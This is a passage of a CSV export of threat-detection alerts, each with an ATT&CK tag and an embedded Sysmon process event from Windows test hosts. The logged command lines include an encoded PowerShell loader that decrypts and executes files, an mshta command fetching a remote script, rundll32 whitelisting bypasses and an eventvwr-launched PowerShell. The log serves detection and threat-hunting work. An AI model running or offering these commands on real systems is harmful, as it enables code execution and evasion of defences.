<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:35.352012Z"">
</TimeCreated>
<EventRecordID>16248</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:35.289</Data>
<Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-00109D7F2200</Data>
<Data Name=""ProcessId"">1860</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-DC77-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-69A3-5CD7-0000-001064792200</Data>
<Data Name=""ParentProcessId"">3432</Data>
<Data Name=""ParentImage"">C:\Windows\System32\taskeng.exe</Data>
<Data Name=""ParentCommandLine"">taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close(); ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.286776Z"">
</TimeCreated>
<EventRecordID>4902</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.241</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ProcessId"">776</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:44.055762Z"">
</TimeCreated>
<EventRecordID>6173</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:44.023</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6C-5CEB-0000-0010050C0C00</Data>
<Data Name=""ProcessId"">3520</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
<Data Name=""ParentProcessId"">1536</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
</TimeCreated>
<EventRecordID>16452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
<Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
<Data Name=""ProcessId"">816</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
<Data Name=""ParentProcessId"">3320</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
</TimeCreated>
<EventRecordID>424115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ProcessId"">9116</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ParentProcessId"">7552</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine (&quot;C:\Windows\system32\eventvwr.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
